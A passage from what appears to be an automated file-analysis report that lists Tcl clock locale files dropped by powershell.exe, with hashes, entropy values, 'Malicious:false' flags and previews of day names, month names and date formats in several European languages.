                                                                                                                                                                                                                      SHA-256:9E2FE3851CF13EC79A9B10A09B01CEB0A26044AE0DC90A4E00BE57745E854C79
                                                                                                                                                                                                                      SHA-512:0CCCCF6D61423CEE0389C3BA1A8E94F2B092C53465D1937F5595AF91E46DD38B318D6C7EE3D88B89F32BFB952C0D55E0E67B46D7DF306ECA6690E283ADEB2CB9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nl DAYS_OF_WEEK_ABBREV [list \.. "zo"\.. "ma"\.. "di"\.. "wo"\.. "do"\.. "vr"\.. "za"].. ::msgcat::mcset nl DAYS_OF_WEEK_FULL [list \.. "zondag"\.. "maandag"\.. "dinsdag"\.. "woensdag"\.. "donderdag"\.. "vrijdag"\.. "zaterdag"].. ::msgcat::mcset nl MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mrt"\.. "apr"\.. "mei"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset nl MONTHS_FULL [list \.. "januari"\.. "februari"\.. "maart"\.. "april"\.. "mei"\.. "juni"\.. "juli"\.. "augustus"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat::mcset nl DATE_FORM
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):286
                                                                                                                                                                                                                      Entropy (8bit):4.865165930946383
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xo4gPPdjog9X3vLjog9X3v6mjo49+3vnFDoAkvn:4EnLB3835gHdPF3vjF3v64I3v9dmn
                                                                                                                                                                                                                      MD5:3261F397ED0291368FF1881E7BA08ECE
                                                                                                                                                                                                                      SHA1:7147ABB62034EB152B1FED9246A533535F07372C
                                                                                                                                                                                                                      SHA-256:77A69DD60D171B321512B14794E75A66FF753410C007997B310790D86E09B057
                                                                                                                                                                                                                      SHA-512:C1526F454FA594DAD056B056F76F01D8B2AB713D04EB2A3643416B8E741B248CC94E000BAEE5B0F60436B88B1216FB1DE7F7C3FA456D4A4FBDE24F97C3B739B8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nl_BE DATE_FORMAT "%d-%m-%y".. ::msgcat::mcset nl_BE TIME_FORMAT "%T".. ::msgcat::mcset nl_BE TIME_FORMAT_12 "%T".. ::msgcat::mcset nl_BE DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1200
                                                                                                                                                                                                                      Entropy (8bit):4.282788574144479
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83tCtrJwuQrIsmYmLAxyIQ4HU92W1W4/3Hv+v31:434suQrILAt0EafIF
                                                                                                                                                                                                                      MD5:985E97517C2BF37719A618F575DF392C
                                                                                                                                                                                                                      SHA1:65BC07FC3A955300ED09B7485F90AEC18CBAD43F
                                                                                                                                                                                                                      SHA-256:06FA2D6D8C59D0B8EAC2EDE5AB0DDB8B6E095D1A023B1966FCE3B65916FA14FB
                                                                                                                                                                                                                      SHA-512:75BC14DBAD147A98D32D2AF0BE0BE50F115BB9C3BBE283B53977B9F264A055734B30F6B1C4EEE9686F1874D178C535111731C92D495B7D370FB17213B65C9A40
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nn DAYS_OF_WEEK_ABBREV [list \.. "su"\.. "m\u00e5"\.. "ty"\.. "on"\.. "to"\.. "fr"\.. "lau"].. ::msgcat::mcset nn DAYS_OF_WEEK_FULL [list \.. "sundag"\.. "m\u00e5ndag"\.. "tysdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "laurdag"].. ::msgcat::mcset nn MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "mai"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "des"\.. ""].. ::msgcat::mcset nn MONTHS_FULL [list \.. "januar"\.. "februar"\.. "mars"\.. "april"\.. "mai"\.. "juni"\.. "juli"\.. "august"\.. "september"\.. "oktober"\.. "november"\.. "desember"\.. ""].. ::msgcat::mcset nn BCE "f.Kr."
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1263
                                                                                                                                                                                                                      Entropy (8bit):4.459506202908786
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83lUj0ORGgIzdW6RDYKG7FwRc0ypvOvX:43+HMg2W6RDYnFwRc0ydYX
                                                                                                                                                                                                                      MD5:79AB7C13AA3833A1DAEADDB1144CCE55
                                                                                                                                                                                                                      SHA1:C01ABC2F16549CAEC6B081448B2CBA88A680E250
                                                                                                                                                                                                                      SHA-256:61462C325DB0065352D8155307F949869862A86CAC67AD7BB6703F57A7FA2FF3
                                                                                                                                                                                                                      SHA-512:79EB696164FDDD9B121558C2780E54E295FF2DC4D8E87A0DE507B4F2925612721A98FF5010199CB68CF894ACA7A07884E9E02F3DC1E078D241431E3DC884C0A1
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset pl DAYS_OF_WEEK_ABBREV [list \.. "N"\.. "Pn"\.. "Wt"\.. "\u015ar"\.. "Cz"\.. "Pt"\.. "So"].. ::msgcat::mcset pl DAYS_OF_WEEK_FULL [list \.. "niedziela"\.. "poniedzia\u0142ek"\.. "wtorek"\.. "\u015broda"\.. "czwartek"\.. "pi\u0105tek"\.. "sobota"].. ::msgcat::mcset pl MONTHS_ABBREV [list \.. "sty"\.. "lut"\.. "mar"\.. "kwi"\.. "maj"\.. "cze"\.. "lip"\.. "sie"\.. "wrz"\.. "pa\u017a"\.. "lis"\.. "gru"\.. ""].. ::msgcat::mcset pl MONTHS_FULL [list \.. "stycze\u0144"\.. "luty"\.. "marzec"\.. "kwiecie\u0144"\.. "maj"\.. "czerwiec"\.. "lipiec"\.. "sierpie\u0144"\.. "wrzesie\u0144"\.. "pa\u017adziernik"\.. "listopad"\..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1177
                                                                                                                                                                                                                      Entropy (8bit):4.394980756969744
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83CYkjBc1yHYJt//0/I31YMY47flV7YaqgCyt9Fo8g6Gtvt76svi:43C5LHcNnxJ9Ltg6Gpt76Ki
                                                                                                                                                                                                                      MD5:8F53B3571DD29E12BD33349CFA32F28F
                                                                                                                                                                                                                      SHA1:C125E059B8BFE5FECD482D1A1DA50B8678872BF6
                                                                                                                                                                                                                      SHA-256:6F6EEEDDCF232BDCB952592A144810CED44A1CBB4BCC2C062D5F98D441505380
                                                                                                                                                                                                                      SHA-512:5CD7E7097B720E5399795126A71348816CBA697FD8F14160779E982ADAB00D5994978E2F9445785B0DE62F6F14232278AD1A65BC53730CA58D676B057F0BC406
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset pt DAYS_OF_WEEK_ABBREV [list \.. "Dom"\.. "Seg"\.. "Ter"\.. "Qua"\.. "Qui"\.. "Sex"\.. "S\u00e1b"].. ::msgcat::mcset pt DAYS_OF_WEEK_FULL [list \.. "Domingo"\.. "Segunda-feira"\.. "Ter\u00e7a-feira"\.. "Quarta-feira"\.. "Quinta-feira"\.. "Sexta-feira"\.. "S\u00e1bado"].. ::msgcat::mcset pt MONTHS_ABBREV [list \.. "Jan"\.. "Fev"\.. "Mar"\.. "Abr"\.. "Mai"\.. "Jun"\.. "Jul"\.. "Ago"\.. "Set"\.. "Out"\.. "Nov"\.. "Dez"\.. ""].. ::msgcat::mcset pt MONTHS_FULL [list \.. "Janeiro"\.. "Fevereiro"\.. "Mar\u00e7o"\.. "Abril"\.. "Maio"\.. "Junho"\.. "Julho"\.. "Agosto"\.. "Setembro"\.. "Outubro"\.. "Novembro"\.. "Dezembro"
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):286
                                                                                                                                                                                                                      Entropy (8bit):4.8608779725401785
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xofm6GPWWjofAW3vLjofAW3v6mjofm6T+3vnFDoAkvn:4EnLB383+NGdg93vk93v6fNK3v9dmn
                                                                                                                                                                                                                      MD5:A2626EA95C2480FEA68906AE6A1F6993
                                                                                                                                                                                                                      SHA1:A0592902337C00FC2E70B1DFB3A42453A86535BB
                                                                                                                                                                                                                      SHA-256:320BE7D5B730091E6FA35F196314737261C8E154577DCF6AC8C2057D44394AD7
                                                                                                                                                                                                                      SHA-512:9801A87D024565676D4F3EAF0702C213E59FC2B6719D8BE95C19C9ED53FC43487F65F5408378B401A2B4C2BD4E2E391C2D848CA87739A6082AB7766EC6B9EFE1
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset pt_BR DATE_FORMAT "%d-%m-%Y".. ::msgcat::mcset pt_BR TIME_FORMAT "%T".. ::msgcat::mcset pt_BR TIME_FORMAT_12 "%T".. ::msgcat::mcset pt_BR DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1224
                                                                                                                                                                                                                      Entropy (8bit):4.350784108088039
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83coPUMSeZmkTMm41icpK+7ZVoImEcVUCWdvHvWIn:43lPHFmkm1iMVoxEc+CWZPWIn
                                                                                                                                                                                                                      MD5:F6575EC17966320106FF7ABDFB3186E2
                                                                                                                                                                                                                      SHA1:68C6B72D664FDA27450FCE8B5734AB627CE825D7
                                                                                                                                                                                                                      SHA-256:25ED6AC7A353E23B954B98611AE3B7E56BDCF2B0CB0DB358253CFB8BEBBB831C
                                                                                                                                                                                                                      SHA-512:E564543231922A17C898419545BFA65E5E31FE9F005FDD201B735CFDE08E96FB3B98349C2A7959E29CA8F7E6934B0C4C6DE6B5E67209D0DD9A7746DFEBF037B3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ro DAYS_OF_WEEK_ABBREV [list \.. "D"\.. "L"\.. "Ma"\.. "Mi"\.. "J"\.. "V"\.. "S"].. ::msgcat::mcset ro DAYS_OF_WEEK_FULL [list \.. "duminic\u0103"\.. "luni"\.. "mar\u0163i"\.. "miercuri"\.. "joi"\.. "vineri"\.. "s\u00eemb\u0103t\u0103"].. ::msgcat::mcset ro MONTHS_ABBREV [list \.. "Ian"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Mai"\.. "Iun"\.. "Iul"\.. "Aug"\.. "Sep"\.. "Oct"\.. "Nov"\.. "Dec"\.. ""].. ::msgcat::mcset ro MONTHS_FULL [list \.. "ianuarie"\.. "februarie"\.. "martie"\.. "aprilie"\.. "mai"\.. "iunie"\.. "iulie"\.. "august"\.. "septembrie"\.. "octombrie"\.. "noiembrie"\.. "decembrie"\.. ""].. ::msgcat:
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2091
                                                                                                                                                                                                                      Entropy (8bit):4.2886524607041006
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:43D+pQ7keidQfRQPgQHB81Z/sFIAZSQWQXQrQxJQjQRnQBFQiWftkWt:26pgkeoSnpjA4tMYiJcCMFmVRt
                                                                                                                                                                                                                      MD5:9F1C8DD58550558977821FD500E7C0E0
                                                                                                                                                                                                                      SHA1:EFDD809BC2872A5BE0E353D31BE6D7D72E4B829C
                                                                                                                                                                                                                      SHA-256:BB35BB6F07BAEF72C329EC3E95D6527A2736070EE2FFE5DE227E1FF0332390F8
                                                                                                                                                                                                                      SHA-512:AA3C5C40AE9D342F8287958355C3321CF60566AD3E84E3D18D782FC022A998DA275506A61010A65D2E7D7578F2919C47C63AB0BA63A38800AA48D4B88ACE54D3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ru DAYS_OF_WEEK_ABBREV [list \.. "\u0412\u0441"\.. "\u041f\u043d"\.. "\u0412\u0442"\.. "\u0421\u0440"\.. "\u0427\u0442"\.. "\u041f\u0442"\.. "\u0421\u0431"].. ::msgcat::mcset ru DAYS_OF_WEEK_FULL [list \.. "\u0432\u043e\u0441\u043a\u0440\u0435\u0441\u0435\u043d\u044c\u0435"\.. "\u043f\u043e\u043d\u0435\u0434\u0435\u043b\u044c\u043d\u0438\u043a"\.. "\u0432\u0442\u043e\u0440\u043d\u0438\u043a"\.. "\u0441\u0440\u0435\u0434\u0430"\.. "\u0447\u0435\u0442\u0432\u0435\u0440\u0433"\.. "\u043f\u044f\u0442\u043d\u0438\u0446\u0430"\.. "\u0441\u0443\u0431\u0431\u043e\u0442\u0430"].. ::msgcat::mcset ru MONTHS_ABBREV [list \.. "\u044f\u043d\u0432"\.. "\u0444\u0435\u0432"\.. "\u043c\u0430\u0440"\.. "\u0430\u043f\u0440"\.. "\u043c\u0430\u0439"\.. "\u0438\u044e\u
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):248
                                                                                                                                                                                                                      Entropy (8bit):4.9420431225061
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoVAgWIZoVY9X3vtfNrsoVA9+3vW6Q9vn:4EnLB383SFWIyaX3vtNl/3vWHNn
                                                                                                                                                                                                                      MD5:DC98D88964650E302BE97FDB3B33326E
                                                                                                                                                                                                                      SHA1:1DDDCC4265D7B980B867FEE674BEF2FD87D823F7
                                                                                                                                                                                                                      SHA-256:13E4E79A0ED82034BADE0CFF8DEF5DE1222F6968108AD710662BDB7DAF36D7E1
                                                                                                                                                                                                                      SHA-512:F3B9D528C529DD520FEDA3C20ED354E521C5B3C29F3317E15B7939CE06A3D67554D34DD6E54FE038585E46C560C604A1FD7E7F84914086B5994D52CE2C9E99CE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ru_UA DATE_FORMAT "%d.%m.%Y".. ::msgcat::mcset ru_UA TIME_FORMAT "%k:%M:%S".. ::msgcat::mcset ru_UA DATE_TIME_FORMAT "%d.%m.%Y %k:%M:%S %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1212
                                                                                                                                                                                                                      Entropy (8bit):4.359036493565628
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83/YIXo4YY0dD6kMm7fX2NaSIvZdHZgHZ/IxvaGWxvtl9svWTN:43rLTR44/yWltOWB
                                                                                                                                                                                                                      MD5:E297221FA73BD78577B398BC7D061D21
                                                                                                                                                                                                                      SHA1:F2A6B456272F913A9E97C495CEE73AC774C90FA1
                                                                                                                                                                                                                      SHA-256:E65D6E5E837DF0A2DF0DB77BCE45334BBC27EFFF9023C37119E75D49932D9D6C
                                                                                                                                                                                                                      SHA-512:AB9DDAE7CB21193C7753041F0B88CF2D40987E7E604B47816219458D217F084AA4EBF36719E22AAB3FD71A271D9F956ADC353182991903D7ADE8C8F00F6B2F9B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sh DAYS_OF_WEEK_ABBREV [list \.. "Ned"\.. "Pon"\.. "Uto"\.. "Sre"\.. "\u010cet"\.. "Pet"\.. "Sub"].. ::msgcat::mcset sh DAYS_OF_WEEK_FULL [list \.. "Nedelja"\.. "Ponedeljak"\.. "Utorak"\.. "Sreda"\.. "\u010cetvrtak"\.. "Petak"\.. "Subota"].. ::msgcat::mcset sh MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Maj"\.. "Jun"\.. "Jul"\.. "Avg"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dec"\.. ""].. ::msgcat::mcset sh MONTHS_FULL [list \.. "Januar"\.. "Februar"\.. "Mart"\.. "April"\.. "Maj"\.. "Juni"\.. "Juli"\.. "Avgust"\.. "Septembar"\.. "Oktobar"\.. "Novembar"\.. "Decembar"\.. ""].. ::msgcat::mcset sh BC
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1255
                                                                                                                                                                                                                      Entropy (8bit):4.4043119723436135
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83c46o40u3rIsmJIcm93ApLDVb2IcU95WFGEXF3eUCvtz/v3e6:43c3ow3rF93Ap7tEXFREtznp
                                                                                                                                                                                                                      MD5:24DA40901D907D35195CC1B3A675EBC7
                                                                                                                                                                                                                      SHA1:8AF31248F06FADA5CFB0D83A940CFF5CE70E2577
                                                                                                                                                                                                                      SHA-256:976813F6C53C9BEBBF976B0F560FD7FC5E4EC4C574D7E1CD31F9A4056765CB7A
                                                                                                                                                                                                                      SHA-512:A9BC6AAFE9AEEDFD1E483E54A2D27871A09ADD6807D8F90410CD2BB82A91BA9DF435652EC9A7C3AD0A080D7F153CA848BB47DAD3936BA30E4AEFF3C474C433CC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sk DAYS_OF_WEEK_ABBREV [list \.. "Ne"\.. "Po"\.. "Ut"\.. "St"\.. "\u0160t"\.. "Pa"\.. "So"].. ::msgcat::mcset sk DAYS_OF_WEEK_FULL [list \.. "Nede\u013ee"\.. "Pondelok"\.. "Utorok"\.. "Streda"\.. "\u0160tvrtok"\.. "Piatok"\.. "Sobota"].. ::msgcat::mcset sk MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "m\u00e1j"\.. "j\u00fan"\.. "j\u00fal"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset sk MONTHS_FULL [list \.. "janu\u00e1r"\.. "febru\u00e1r"\.. "marec"\.. "apr\u00edl"\.. "m\u00e1j"\.. "j\u00fan"\.. "j\u00fal"\.. "august"\.. "september"\.. "okt\u00f3ber"\.. "november"\.. "decem
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1216
                                                                                                                                                                                                                      Entropy (8bit):4.333705818952628
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83MIXpC9opYuGS/BrIsmZ5hv1yAxyIVjd392WFThENvt0vJoO:43fXYujZrqyApYJtyR
                                                                                                                                                                                                                      MD5:CB76F54CBE0D1AAE8BA956B4C51CBD2A
                                                                                                                                                                                                                      SHA1:C1F78375EDB0BD2504553E33B2024C0C63FDB1B2
                                                                                                                                                                                                                      SHA-256:11A6264676DBED87E4F718075127E32E107854F35F141642454F484984084486
                                                                                                                                                                                                                      SHA-512:69964348FF08DE6EEB5E3DD61057FF0DF5441105EB7BEE7FB7E9AC5E26DCC164E3C7C011CA5CD7BC5B97A7872532331C97CCBC80563F6C5A3548014BFA8BEF16
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sl DAYS_OF_WEEK_ABBREV [list \.. "Ned"\.. "Pon"\.. "Tor"\.. "Sre"\.. "\u010cet"\.. "Pet"\.. "Sob"].. ::msgcat::mcset sl DAYS_OF_WEEK_FULL [list \.. "Nedelja"\.. "Ponedeljek"\.. "Torek"\.. "Sreda"\.. "\u010cetrtek"\.. "Petek"\.. "Sobota"].. ::msgcat::mcset sl MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "avg"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset sl MONTHS_FULL [list \.. "januar"\.. "februar"\.. "marec"\.. "april"\.. "maj"\.. "junij"\.. "julij"\.. "avgust"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat::mcset sl B
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1321
                                                                                                                                                                                                                      Entropy (8bit):4.408176575111904
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83F7ONQEwXwjjTlVoSEh76W/X+WZQJ4hv+H6v2V:43NwjPEwl4VQ8q
                                                                                                                                                                                                                      MD5:E606F620F03EC0FBDBE6551601299C5F
                                                                                                                                                                                                                      SHA1:0B50AB679E8D90D8E7319BCADAC426E004594D3B
                                                                                                                                                                                                                      SHA-256:1F4EFD78F6B45B65F73F09B2F52FC13C2A7C4138DCB7664804878D197B6EBDF9
                                                                                                                                                                                                                      SHA-512:08AF2B51EB7111E334ADDA3A03F9A8816C104E9742B523EC363FB5131A3DF73D298A8DDCD573D23C23C65CCFD2B8898DF75AE3D4F04BF80744044FB6BAB5EC0A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sq DAYS_OF_WEEK_ABBREV [list \.. "Die"\.. "H\u00ebn"\.. "Mar"\.. "M\u00ebr"\.. "Enj"\.. "Pre"\.. "Sht"].. ::msgcat::mcset sq DAYS_OF_WEEK_FULL [list \.. "e diel"\.. "e h\u00ebn\u00eb"\.. "e mart\u00eb"\.. "e m\u00ebrkur\u00eb"\.. "e enjte"\.. "e premte"\.. "e shtun\u00eb"].. ::msgcat::mcset sq MONTHS_ABBREV [list \.. "Jan"\.. "Shk"\.. "Mar"\.. "Pri"\.. "Maj"\.. "Qer"\.. "Kor"\.. "Gsh"\.. "Sht"\.. "Tet"\.. "N\u00ebn"\.. "Dhj"\.. ""].. ::msgcat::mcset sq MONTHS_FULL [list \.. "janar"\.. "shkurt"\.. "mars"\.. "prill"\.. "maj"\.. "qershor"\.. "korrik"\.. "gusht"\.. "shtator"\.. "tetor"\.. "n\u00ebntor"\.. "dhjetor"\.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2087
                                                                                                                                                                                                                      Entropy (8bit):4.307749748884122
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:43ilQTSBQrQP9QenzMKSFD9NI/QiNQEQrQL1KKYjU5rtAx:2I5EyLMKSFZNIYMzYMKKiqW
                                                                                                                                                                                                                      MD5:BF363AB60B57F6D8FDCDBFD230A28DDF
                                                                                                                                                                                                                      SHA1:6375CBA0A2197DA7E65BEE45C42F02C4F0B9142D
                                                                                                                                                                                                                      SHA-256:FA00A7B22C9941F6C2B893F22B703DCB159CA2F2E4005FD6A74A632AEB786BFA
                                                                                                                                                                                                                      SHA-512:91AD8085EF321A5A0E4D2ED204940CB66E8E230BBEDE59A8A07D1CEED9155FCC6B075A1FCC44AE834C1FEEEB3A59256C4310684C5AC453D4C50DFABD88469814
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sr DAYS_OF_WEEK_ABBREV [list \.. "\u041d\u0435\u0434"\.. "\u041f\u043e\u043d"\.. "\u0423\u0442\u043e"\.. "\u0421\u0440\u0435"\.. "\u0427\u0435\u0442"\.. "\u041f\u0435\u0442"\.. "\u0421\u0443\u0431"].. ::msgcat::mcset sr DAYS_OF_WEEK_FULL [list \.. "\u041d\u0435\u0434\u0435\u0459\u0430"\.. "\u041f\u043e\u043d\u0435\u0434\u0435\u0459\u0430\u043a"\.. "\u0423\u0442\u043e\u0440\u0430\u043a"\.. "\u0421\u0440\u0435\u0434\u0430"\.. "\u0427\u0435\u0442\u0432\u0440\u0442\u0430\u043a"\.. "\u041f\u0435\u0442\u0430\u043a"\.. "\u0421\u0443\u0431\u043e\u0442\u0430"].. ::msgcat::mcset sr MONTHS_ABBREV [list \.. "\u0408\u0430\u043d"\.. "\u0424\u0435\u0431"\.. "\u041c\u0430\u0440"\.. "\u0410\u043f\u0440"\.. "\u041c\u0430\u0458"\.. "\u0408\u0443\u043d"\.. "\
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1219
                                                                                                                                                                                                                      Entropy (8bit):4.3542418837714285
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83qoLt6yLQoAusrIsmZ5m4AcjTHX92WFfjr4MvBvX:43ZLxQNusrr4Aw3Jkq1X
                                                                                                                                                                                                                      MD5:3B5C3FFA0829768470BDA1B46D882060
                                                                                                                                                                                                                      SHA1:C96799036EC5CCDE799A6B50CD7748908935A2F3
                                                                                                                                                                                                                      SHA-256:483916B51BD7E071E88F9EC36AAF3E08FEA823991532F832DE491C6C40B55A9F
                                                                                                                                                                                                                      SHA-512:684FA249123878AA7F856DF0FD3B0D9F041113CFEA8EEFA47D0E1948DA23694330BF0D62BA896A3891CD559C16CAE9330BF31508F530AC003D2929D5FD9246D8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sv DAYS_OF_WEEK_ABBREV [list \.. "s\u00f6"\.. "m\u00e5"\.. "ti"\.. "on"\.. "to"\.. "fr"\.. "l\u00f6"].. ::msgcat::mcset sv DAYS_OF_WEEK_FULL [list \.. "s\u00f6ndag"\.. "m\u00e5ndag"\.. "tisdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "l\u00f6rdag"].. ::msgcat::mcset sv MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset sv MONTHS_FULL [list \.. "januari"\.. "februari"\.. "mars"\.. "april"\.. "maj"\.. "juni"\.. "juli"\.. "augusti"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat:
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1040
                                                                                                                                                                                                                      Entropy (8bit):4.108744949579904
                                                                                                                                                                                                                      Encrypted:false
